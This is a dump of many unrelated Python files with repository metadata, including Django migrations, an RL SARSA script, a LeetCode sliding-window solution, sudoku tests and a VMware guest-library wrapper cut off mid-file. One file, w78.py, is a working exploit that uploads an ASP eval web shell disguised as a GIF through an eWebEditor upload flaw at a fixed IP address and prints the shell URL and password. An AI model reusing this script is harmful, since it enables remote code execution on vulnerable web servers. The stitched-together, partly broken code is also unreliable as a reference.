def bayes_theorem(df, col1, event1, col2, event2):
"""Calculates the conditional probability using Bayes Theorem.
This function accepts the dataframe, two columns along with two conditions to calculate the probability, P(B|A).
You can call the calculate_probability_discrete() to find the basic probabilities and then use them to find the conditional probability.
Keyword arguments:
df -- the dataframe
col1 -- the first column where the first event is recorded
event1 -- event to define the first condition
col2 -- the second column where the second event is recorded
event2 -- event to define the second condition
Returns:
prob -- calculated probability for the event1 given event2 has already occured
"""
| [
"[email protected]"
]
| |
248d8b61cb8796e0a111657d391f2c4e4015226f | bb80ddf8324408705a30e8644a2d693252cf54e9 | /products/migrations/0001_initial.py | d675a60a138b0ee81ea285f6556589b60a0cadad | []
| no_license | Code-Institute-Submissions/full_stack_stream_four_happy_box | 483d4286b26825cf4428600b677147fd63201ff0 | 5c2fd5803bc8164d4028702b3859f5eb891d70e3 | refs/heads/master | 2020-03-27T19:57:01.538937 | 2018-09-01T18:37:26 | 2018-09-01T18:37:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,339 | py | # Generated by Django 2.0.7 on 2018-07-11 12:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, default='', max_length=150)),
('slug', models.SlugField(max_length=150, unique=True)),
],
options={
'verbose_name': 'category',
'ordering': ('name',),
'verbose_name_plural': 'categories',
},
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=20)),
('image', models.ImageField(blank=True, upload_to='images')),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, default='', max_length=254)),
('slug', models.SlugField(max_length=100)),
('description', models.TextField(blank=True)),
('brand', models.CharField(default='', max_length=50)),
('price', models.DecimalField(decimal_places=2, max_digits=6)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='products.Category')),
],
options={
'ordering': ('name',),
},
),
migrations.AddField(
model_name='image',
name='product',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='product_images', to='products.Product'),
),
migrations.AlterIndexTogether(
name='product',
index_together={('id', 'slug')},
),
]
| [
"[email protected]"
]
| |
d591cfa31e9c148bfac88be4aefee2acdd0a8266 | fc39e431bcf4ead647b3c4a2b8fb8dc772928852 | /Indoor_Webapp_B/Indoor_Webapp_B/Indoor_Webapp_B/manage.py | eec6c95947e4ab94a6f3118584215b324c299e0c | [
"BSD-3-Clause"
]
| permissive | DavidTF85/IndooeAir-Webapp-B | c129414be094c39a00fa397e4eed16dc39f7bb14 | 579f7593116d743e566e16219370c98e2937844b | refs/heads/master | 2020-09-12T08:32:24.099793 | 2019-11-18T05:24:55 | 2019-11-18T05:24:55 | 222,369,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 656 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Indoor_Webapp_B.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
5277a28915df23b9142e32432af44be09e017f3a | 3add20877ed753be70402e97f40ad3737a265515 | /lecture_advanced/Lecture1.HotFollowupQuestions/386. Longest Substring with At Most K Distinct Characters.py | 93cfa12ae7c8ad41d8048f0341ca09073b900826 | []
| no_license | zhuohuwu0603/interview-algothims | 85f48b7de2e87129fd353528b114cb80c8877d7b | 338d3bc2f2916c5c4936767b07b2fd22b4121049 | refs/heads/master | 2022-01-08T11:27:16.441367 | 2019-06-12T05:49:25 | 2019-06-12T05:49:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | py | '''
Given a string s, find the length of the longest substring T that contains at most k distinct characters.
Example
For example, Given s = "eceba", k = 3,
T is "eceb" which its length is 4.
Challenge
O(n), n is the size of the string s.
'''
import collections
class Solution:
"""
@param s: A string
@param k: An integer
@return: An integer
"""
def lengthOfLongestSubstringKDistinct(self, s, k):
# write your code here
if not s or k <= 0:
return 0
start, end, ans = 0, 0, 0
myhash = collections.defaultdict(int)
for start in range(len(s)):
while end < len(s):
myhash[s[end]] += 1
if len(myhash) <= k:
end += 1
else:
break
ans = max(ans, end - start)
myhash[s[start]] -= 1
if myhash[s[start]] == 0:
del myhash[s[start]]
return ans
'''
算法武器:前向型移窗口类动双指针
本题的题型是滑动窗口类型,使用模板写法:
定义start,end,ans三个变量
start做外层for循环
end做内层while循环
while条件为end的边界和题目的约束
更新答案部分必须要加条件判断
更新答案必须在更新end变量之前
对于hash表的处理都是放在while循环内进行,一般不需要在for层做任何特别处理
注意:
本题求解的是上界答案问题
我们的答案直接在内层while循环中更新,而不需要当while退出之后再根据条件更新答案,因为while循环的条件是end在边界内,同时满足题目条件,这意味着我们找到一组有效解,我们需要和全局解比较,不断更新上界的解
在更新答案的时候还是要确定一下条件,再更新
if len(hashmap) <= k:
ans = max(ans, end - start + 1)
其他类求下界问题,比如sum类求下界问题,我们就需要在跳出while循环单独更新。因为while循环进行的条件是end在边界内,同时不满足条件的时候,我们继续扩大窗口边界,移动end指针。当循环跳出时,我们可能找到了一组有效解,所以我们还需要检查条件是否满足,满足时才将其和全局答案比较、更新
''' | [
"[email protected]"
]
| |
019278eb3581d9502a8dea534db2529d1d65b1bd | b52547e856f3dee82a332105f3b2553133c7e560 | /ModelFreeRLPolicyLearning/policy_learning_sarsa.py | 2c874536de7fef43e8b732237fb216c72c461639 | []
| no_license | yuhsh24/RLlearning | 0d3410b9254527e74dc932ccf502cd8972d0bb23 | 2a49ac9ea877cae27c0ce513b795c10a2266b166 | refs/heads/master | 2021-01-19T05:22:23.013144 | 2016-07-21T09:48:49 | 2016-07-21T09:48:49 | 63,664,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,224 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import grid_mdp
import random
random.seed(0)
import matplotlib.pyplot as plt
grid = grid_mdp.Grid_Mdp()
states = grid.getStates()
actions = grid.getActions()
gamma = grid.getGamma()
#epsilon greedy policy#
def epsilon_greedy(qfunc, state, epsilon):
amax = 0
key = "%d_%s"%(state, actions[0])
qmax = qfunc[key]
for i in xrange(len(actions)):
key = "%d_%s"%(state, actions[i])
q = qfunc[key]
if qmax < q:
qmax = q
amax = i
#probability
pro = [0.0 for i in xrange(len(actions))]
pro[amax] += 1 - epsilon
for i in xrange(len(actions)):
pro[i] += epsilon / len(actions)
#choose
r = random.random()
s = 0.0
for i in xrange(len(actions)):
s += pro[i]
if s >= r: return actions[i]
return actions[len(actions) - 1]
best = dict()
def read_best():
f = open("best_qfunc")
for line in f:
line = line.strip()
if len(line) == 0: continue
element = line.split(":")
best[element[0]] = float(element[1])
def compute_error(qfunc):
sum1 = 0.0
for key in qfunc:
error = qfunc[key] - best[key]
sum1 += error * error
return sum1
def sarsa(num_iter1, alpha, epsilon):
x = []
y = []
qfunc = dict()
for s in states:
for a in actions:
key = "%d_%s"%(s, a)
qfunc[key] = 0.0
for iter1 in xrange(num_iter1):
x.append(iter1)
y.append(compute_error(qfunc))
s = states[int(random.random() * len(states))]
a = actions[int(random.random() * len(actions))]
t = False
count = 0
while False == t and count < 100:
key = "%d_%s"%(s,a)
t, s1, r = grid.transform(s,a)
a1 = epsilon_greedy(qfunc, s1, epsilon)
key1 = "%d_%s"%(s1,a1)
qfunc[key] = qfunc[key] + alpha * (r + gamma * qfunc[key1] - qfunc[key])
s = s1
a = a1
count += 1
plt.plot(x,y,"--",label="sarsa alpha=%2.1f epsilon=%2.1f"%(alpha,epsilon))
plt.show(True)
return qfunc;
if __name__ == "__main__":
read_best()
sarsa(1000, 0.2, 0.2)
| [
"[email protected]"
]
| |
b235e47ceab2dde9ba3dcadac64258bc818f6667 | 0aa0c38985c11331b20e1d9bdeabfdcaf5dea90f | /ex10.py | c77558f62b5bebe437bd461e03d98e8d5357ebd7 | []
| no_license | dongul11/lpthw | 5dd92278a35166e2b465aafd3e171ebc60cd4340 | 35c973e65820601b6231d001d100c06f02558adc | refs/heads/master | 2021-09-22T10:06:14.775565 | 2018-09-07T17:28:43 | 2018-09-07T17:28:43 | 114,300,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | tabby_cat = "\tI'm tabbed in."
persian_cat = "I'm split\non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = '''
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
'''
print (tabby_cat)
print (persian_cat)
print(backslash_cat)
print(fat_cat)
| [
"[email protected]"
]
| |
d7aac9af796fa2c15a1d847133e699fd19779ed9 | 63dc51b514faea7966d529440df80c4a6eab34b1 | /src/test/TestLibSudoku.py | 964c3f328a77ae5d348cff9cdca232b81d916c50 | []
| no_license | caviedes93/PySudoku | af1368dac2f0c374552710cc75132f6799b049f1 | d67e110684526fe188436884ec51ecc89ad6c388 | refs/heads/master | 2020-12-25T10:59:20.442887 | 2013-07-27T22:58:19 | 2013-07-27T22:58:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | '''
Created on 26/07/2013
@author: dominik
'''
import unittest
from lib.libSudoku import get_new_board, is_board_valid
class Test(unittest.TestCase):
def testBoardCreationAndValidation(self):
for i in range(1,100):
newBoard = get_new_board()
self.assertTrue(is_board_valid(newBoard), "newly created board is not valid")
newBoard = get_new_board()
newBoard[0][0] = newBoard[2][2]
self.assertFalse(is_board_valid(newBoard), "invalid board deemed to be valid - group")
newBoard= get_new_board()
newBoard[0][8] = newBoard[0][0]
self.assertFalse(is_board_valid(newBoard), "invalid board deemd te be valid - row")
newBoard= get_new_board()
newBoard[8][8] = newBoard[0][8]
self.assertFalse(is_board_valid(newBoard), "invalid board deemd te be valid - col")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | [
"[email protected]"
]
| |
5d89b263f903257da771dc932d0f1474a6cc84f2 | ca16db75d99903e135589da7c737dbe88a12bb4b | /Scripts/plottingCodes/DescritiveData.py | ea9999121b77355c9c4285d8c8a3b3b0f5df42e8 | []
| no_license | iphyer/CS760_Twitter_Demographics | 7b413ae3753bb7487a8f89b8ba09e9876fabea56 | 3354fde862dbbab8965c0dd709a02643849e0668 | refs/heads/master | 2021-09-13T06:42:48.524495 | 2018-04-26T02:42:16 | 2018-04-26T02:42:16 | 111,339,780 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 5 20:44:28 2017
@author: mingrenshen
"""
# import libarary needed
import pandas as pd # data processing
import matplotlib.pyplot as plt
######################################################
# read in data
######################################################
## user data
allUsrFeatureData = pd.read_csv("../data/louis_users_all_features_label_1205_updated.csv")
# plotting Data
#grouped = allUsrFeatureData['freqWeekDay'].groupby('gender')
print allUsrFeatureData['gender'].value_counts()
# Font for figure
font_axis_publish = {
'color': 'black',
'weight': 'normal',
'size': 15,
}
#ax = allUsrFeatureData.boxplot(column='freqWeekDay',by='gender')
#plt.ylabel('RMSF ($\AA$)', fontdict=font_axis_publish)
#plt.xlim(0,1000)
#plt.set_title("")
col_list = list(allUsrFeatureData.columns.values)
starting_index = col_list.index("gender")
for i in range(len(col_list)):
if i > starting_index:
curr_feature = col_list[i]
allUsrFeatureData.boxplot(column=curr_feature,by='gender')
plt.title(curr_feature, fontdict=font_axis_publish)
plt.suptitle("")
plt.xlabel('gender', fontdict=font_axis_publish)
#plt.show()
str_tmp = curr_feature + '.png'
plt.savefig(str_tmp)
plt.close() | [
"[email protected]"
]
| |
d5cdfc7ff6bc5ac45f96cbed28e972545aea0552 | a612b1ee8e604dc5f98f009b2b88a82b7c63bb22 | /hestia/wsgi.py | cfb6467a8fd3d7271dcebde7d32747472c4de2a0 | [
"MIT"
]
| permissive | GDGVIT/hestia-report | e09a7bf8d7a5b1317495821c660291af3263211f | 5fedd89b9a8fbc32e4f81a7529f10a706b01fe6c | refs/heads/master | 2021-04-24T02:43:09.157623 | 2020-07-18T14:44:26 | 2020-07-18T14:44:26 | 250,063,038 | 0 | 3 | MIT | 2021-02-20T02:32:06 | 2020-03-25T18:48:01 | Python | UTF-8 | Python | false | false | 389 | py | """
WSGI config for hestia project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hestia.settings')
application = get_wsgi_application()
| [
"[email protected]"
]
| |
174aec0b7bfde27c24cc6abccfd345e1ef6dced6 | 48ac4b8138b490a876a2530dad1bca29f1823de5 | /first_tests/colecciones.py | 5c290b80eb83d6767835a388a0a42d158bb60b7a | [
"MIT"
]
| permissive | Gorwast/python-tests | dbb7222d6a3ccdc2de0d5ad90156f02a4ba69607 | 342605fdfa50d05c645e12c15b4db24d3f7cb7f0 | refs/heads/master | 2023-01-08T20:24:03.893124 | 2020-11-18T21:16:18 | 2020-11-18T21:16:18 | 272,347,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | #Collections: List
l1 = [22, True, "String", [4, 5]]
l2 = [15, 30, 45, 60]
var1 = l1[0]
print("List: ")
print(var1)
print(l2[3])
print(l2[0:2])
for elemento in l2:
print(elemento)
###Collections: Tupla
t1 = (10, False, 3.2, (2, 3))
print(type(t1))
print(type(l1))
var2 = t1[1]
print("Tuple: ")
print(t1[2])
print(var2)
###Colecciones: Diccionario
d1 = {'Name': 'Luis', 'Age': 21, 'Theme': 'Development'}
var3 = d1{'Age'}
print('Dictionary: ')
print()
| [
"[email protected]"
]
| |
0dfb49a2afd192c3a3d067f55be0b096846c7d5a | 8b8af2d3a8c04ab75d0b331771fa16e0bfe96301 | /storage/csv_dictwrite.py | 87f5899f076e23b15d8bfb31811c34902727a421 | []
| no_license | RyukerLiu/introducing-python | 6a44b6560e0f82b1886d3359cd0b4bc21e486430 | f902a1fa7b31cd6c1978d176fec3b1bf6bb23718 | refs/heads/master | 2020-05-03T01:25:10.869550 | 2019-04-02T07:20:20 | 2019-04-02T07:20:20 | 178,336,744 | 0 | 0 | null | 2019-03-29T05:13:19 | 2019-03-29T05:13:19 | null | UTF-8 | Python | false | false | 254 | py | import csv
villains = [{'first': 'Doctor', 'last': 'No'} , {'first': 'Rosa', 'last' : 'Klebb'}]
with open('villians', 'wt', newline='') as fout:
csvout = csv.DictWriter(fout, ['first', 'last'])
csvout.writeheader()
csvout.writerows(villains)
| [
"[email protected]"
]
| |
c3ff962e9bc2259450ab129275683d0d23c67865 | 2411ee54802c71aa40895e827171f07289194990 | /w78.py | 798cb1329435e69c608c816bdb9724c582d3101e | []
| no_license | GoodJob567/eweb-exp | aeaf14a715279f07307c6761110cdd2dcdff946d | 26911dbf26563684a40646220788be04e9532fab | refs/heads/master | 2023-02-16T03:28:46.829739 | 2021-01-14T11:30:21 | 2021-01-14T11:30:21 | 329,593,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | import requests
key="cmd"
requests.get("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp")
# 要上传的文件
f = open('shell.gif', 'w')
f.write('<%eval request("'+key+'")%>')
f.close()
f={'uploadfile':open('shell.gif','rb')}
r=requests.post("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp",files=f).content
i=r.find(b"d('")
r=r[i+3:]
i=r.find(b"'")
print("URL: http://172.16.12.2"+r[:i].decode())
print("key is: "+key) | [
"[email protected]"
]
| |
edcede7c435a63d0e75eb252da4cc153f45acc02 | 68f04671ed3e2aeb2032a4fdecbede89cf9e1832 | /ridge.py | de8b2783a7c235dd6d36114b04259136a70ee35a | []
| no_license | sushuang9210/machine_learning_algorithms | 306c3fa086326cefd2c463f5d16cbe9829abc447 | 4aac5c664816612b1d4f078f5b7a548474bb9534 | refs/heads/master | 2020-03-18T17:07:35.444194 | 2018-06-11T04:18:25 | 2018-06-11T04:18:25 | 135,007,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 835 | py | import numpy as np
from sklearn.linear_model import RidgeClassifier
class Ridge:
def __init__(self,data_1,data_2,model_parameters):
self.clf = RidgeClassifier(tol=float(model_parameters[0]), solver=model_parameters[1])
num_data_1 = data_1.shape[0]
num_data_2 = data_2.shape[0]
data_1[:,-1] = np.ones((num_data_1))
data_2[:,-1] = np.zeros((num_data_2))
self.train_set = np.concatenate((data_1, data_2),axis=0)
np.random.shuffle(self.train_set)
self.X_train = self.train_set[:,0:-1]
self.y_train = self.train_set[:,-1]
def ridge_train(self):
self.clf.fit(self.X_train,self.y_train)
def ridge_predict(self,test):
output_1 = self.clf.predict(test)
output_2 = np.ones((test.shape[0])) - output_1
return output_1, output_2
| [
"[email protected]"
]
| |
8484b482275e2ea081b24eac4c59213d8ff39e93 | 0889098368a18cc6ecfa442cfe86ed10a5ba32d6 | /myblog/admin.py | 300fd70c10c84a714d630170dbbed01102456364 | []
| no_license | waaaaargh/myblog | 9932ee5606497851f9ad99b4f1da1a9a604495f6 | 95cd823ea70bdc6e835f63590dfa36da5c4e6d25 | refs/heads/master | 2016-09-06T09:15:29.069543 | 2015-03-24T04:16:32 | 2015-03-24T04:16:32 | 9,065,605 | 0 | 0 | null | 2013-10-30T12:22:26 | 2013-03-27T23:02:40 | Python | UTF-8 | Python | false | false | 662 | py | from os.path import join
from myblog import app, model, db, base_path
from flask.ext.admin import Admin
from flask.ext.admin.contrib.sqla import ModelView
from flask.ext.admin.contrib.fileadmin import FileAdmin
admin = Admin(app, name="MyBlog")
class PostView(ModelView):
form_excluded_columns = ['date', 'comments']
admin.add_view(PostView(model.post, db.session))
class CategoryView(ModelView):
form_excluded_columns = ['posts']
admin.add_view(CategoryView(model.category, db.session))
class CommentView(ModelView):
pass
admin.add_view(CommentView(model.comment, db.session))
admin.add_view(FileAdmin(join(base_path, "static"), "/static/"))
| [
"[email protected]"
]
| |
8c5ffaaa66db4fcbb98cfd663e36037edaa8163a | abaa806550f6e6e7bcdf71b9ec23e09a85fe14fd | /data/global-configuration/packs/vmware/collectors/vmguestlib.py | eb9e2dabd67d95667afa30dc59ee76accdf5f3c7 | [
"MIT"
]
| permissive | naparuba/opsbro | 02809ddfe22964cd5983c60c1325c965e8b02adf | 98618a002cd47250d21e7b877a24448fc95fec80 | refs/heads/master | 2023-04-16T08:29:31.143781 | 2019-05-15T12:56:11 | 2019-05-15T12:56:11 | 31,333,676 | 34 | 7 | null | null | null | null | UTF-8 | Python | false | false | 22,971 | py | ### This program is free software; you can redistribute it and/or
### modify it under the terms of the GNU General Public License
### as published by the Free Software Foundation; either version 2
### of the License, or (at your option) any later version.
###
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
###
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
### Copyright 2013-2014 Dag Wieers <[email protected]>
from ctypes import *
from ctypes.util import find_library
__author__ = 'Dag Wieers <[email protected]>'
__version__ = '0.1.2'
__version_info__ = tuple([int(d) for d in __version__.split('.')])
__license__ = 'GNU General Public License (GPL)'
# TODO: Implement support for Windows and MacOSX, improve Linux support ?
if find_library('vmGuestLib'):
vmGuestLib = CDLL(find_library('vmGuestLib'))
elif find_library('guestlib'):
vmGuestLib = CDLL(find_library('guestlib'))
# elif os.path.exists('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so'):
# vmGuestLib = CDLL('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so')
# elif os.path.exists('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll'):
# vmGuestLib = CDLL('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll')
else:
raise Exception, 'ERROR: Cannot find vmGuestLib library in LD_LIBRARY_PATH'
VMGUESTLIB_ERROR_SUCCESS = 0
VMGUESTLIB_ERROR_OTHER = 1
VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM = 2
VMGUESTLIB_ERROR_NOT_ENABLED = 3
VMGUESTLIB_ERROR_NOT_AVAILABLE = 4
VMGUESTLIB_ERROR_NO_INFO = 5
VMGUESTLIB_ERROR_MEMORY = 6
VMGUESTLIB_ERROR_BUFFER_TOO_SMALL = 7
VMGUESTLIB_ERROR_INVALID_HANDLE = 8
VMGUESTLIB_ERROR_INVALID_ARG = 9
VMGUESTLIB_ERROR_UNSUPPORTED_VERSION = 10
VMErrors = (
'VMGUESTLIB_ERROR_SUCCESS',
'VMGUESTLIB_ERROR_OTHER',
'VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM',
'VMGUESTLIB_ERROR_NOT_ENABLED',
'VMGUESTLIB_ERROR_NOT_AVAILABLE',
'VMGUESTLIB_ERROR_NO_INFO',
'VMGUESTLIB_ERROR_MEMORY',
'VMGUESTLIB_ERROR_BUFFER_TOO_SMALL',
'VMGUESTLIB_ERROR_INVALID_HANDLE',
'VMGUESTLIB_ERROR_INVALID_ARG',
'VMGUESTLIB_ERROR_UNSUPPORTED_VERSION',
)
VMErrMsgs = (
'The function has completed successfully.',
'An error has occurred. No additional information about the type of error is available.',
'The program making this call is not running on a VMware virtual machine.',
'The vSphere Guest API is not enabled on this host, so these functions cannot be used. For information about how to enable the library, see "Context Functions" on page 9.',
'The information requested is not available on this host.',
'The handle data structure does not contain any information. You must call VMGuestLib_UpdateInfo to update the data structure.',
'There is not enough memory available to complete the call.',
'The buffer is too small to accommodate the function call. For example, when you call VMGuestLib_GetResourcePoolPath, if the path buffer is too small for the resulting resource pool path, the function returns this error. To resolve this error, allocate a larger buffer.',
'The handle that you used is invalid. Make sure that you have the correct handle and that it is open. It might be necessary to create a new handle using VMGuestLib_OpenHandle.',
'One or more of the arguments passed to the function were invalid.',
'The host does not support the requested statistic.',
)
class VMGuestLibException(Exception):
'''Status code that indicates success orfailure. Each function returns a
VMGuestLibError code. For information about specific error codes, see "vSphere
Guest API Error Codes" on page 15. VMGuestLibError is an enumerated type
defined in vmGuestLib.h.'''
def __init__(self, errno):
self.errno = errno
self.GetErrorText = vmGuestLib.VMGuestLib_GetErrorText
self.GetErrorText.restype = c_char_p
self.message = self.GetErrorText(self.errno)
self.strerr = VMErrMsgs[self.errno]
def __str__(self):
return '%s\n%s' % (self.message, self.strerr)
class VMGuestLib(Structure):
def __init__(self):
# Reference to virtualmachinedata. VMGuestLibHandle is defined in vmGuestLib.h.
self.handle = self.OpenHandle()
self.UpdateInfo()
# Unique identifier for a session. The session ID changes after a virtual machine is
# migrated using VMotion, suspended and resumed, or reverted to a snapshot. Any of
# these events is likely to render any information retrieved with this API invalid. You
# can use the session ID to detect those events and react accordingly. For example, you
# can refresh and reset any state that relies on the validity of previously retrieved
# information.
# Use VMGuestLib_GetSessionId to obtain a valid session ID. A session ID is
# opaque. You cannot compare a virtual machine session ID with the session IDs from
# any other virtual machines. You must always call VMGuestLib_GetSessionId after
# calling VMGuestLib_UpdateInfo.
# VMSessionID is defined in vmSessionId.h
self.sid = self.GetSessionId()
def OpenHandle(self):
'''Gets a handle for use with other vSphere Guest API functions. The guest library
handle provides a context for accessing information about the virtual machine.
Virtual machine statistics and state data are associated with a particular guest library
handle, so using one handle does not affect the data associated with another handle.'''
if hasattr(self, 'handle'):
return self.handle
else:
handle = c_void_p()
ret = vmGuestLib.VMGuestLib_OpenHandle(byref(handle))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return handle
def CloseHandle(self):
'''Releases a handle acquired with VMGuestLib_OpenHandle'''
if hasattr(self, 'handle'):
ret = vmGuestLib.VMGuestLib_CloseHandle(self.handle.value)
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
del (self.handle)
def UpdateInfo(self):
'''Updates information about the virtual machine. This information is associated with
the VMGuestLibHandle.
VMGuestLib_UpdateInfo requires similar CPU resources to a system call and
therefore can affect performance. If you are concerned about performance, minimize
the number of calls to VMGuestLib_UpdateInfo.
If your program uses multiple threads, each thread must use a different handle.
Otherwise, you must implement a locking scheme around update calls. The vSphere
Guest API does not implement internal locking around access with a handle.'''
ret = vmGuestLib.VMGuestLib_UpdateInfo(self.handle.value)
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
def GetSessionId(self):
'''Retrieves the VMSessionID for the current session. Call this function after calling
VMGuestLib_UpdateInfo. If VMGuestLib_UpdateInfo has never been called,
VMGuestLib_GetSessionId returns VMGUESTLIB_ERROR_NO_INFO.'''
sid = c_void_p()
ret = vmGuestLib.VMGuestLib_GetSessionId(self.handle.value, byref(sid))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return sid
def GetCpuLimitMHz(self):
'''Retrieves the upperlimit of processor use in MHz available to the virtual
machine. For information about setting the CPU limit, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuLimitMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuReservationMHz(self):
'''Retrieves the minimum processing power in MHz reserved for the virtual
machine. For information about setting a CPU reservation, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuReservationMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuShares(self):
'''Retrieves the number of CPU shares allocated to the virtual machine. For
information about how an ESX server uses CPU shares to manage virtual
machine priority, see the vSphere Resource Management Guide.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuShares(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuStolenMs(self):
'''Retrieves the number of milliseconds that the virtual machine was in a
ready state (able to transition to a run state), but was not scheduled to run.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuStolenMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuUsedMs(self):
'''Retrieves the number of milliseconds during which the virtual machine
has used the CPU. This value includes the time used by the guest
operating system and the time used by virtualization code for tasks for this
virtual machine. You can combine this value with the elapsed time
(VMGuestLib_GetElapsedMs) to estimate the effective virtual machine
CPU speed. This value is a subset of elapsedMs.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetElapsedMs(self):
'''Retrieves the number of milliseconds that have passed in the virtual
machine since it last started running on the server. The count of elapsed
time restarts each time the virtual machine is powered on, resumed, or
migrated using VMotion. This value counts milliseconds, regardless of
whether the virtual machine is using processing power during that time.
You can combine this value with the CPU time used by the virtual machine
(VMGuestLib_GetCpuUsedMs) to estimate the effective virtual machine
CPU speed. cpuUsedMs is a subset of this value.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetElapsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostCpuUsedMs(self):
'''Undocumented.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetHostCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemKernOvhdMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemKernOvhdMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemMappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemMappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysFreeMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysFreeMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSharedMB(self):
'''Undocumented.'''
counter = c_uint()
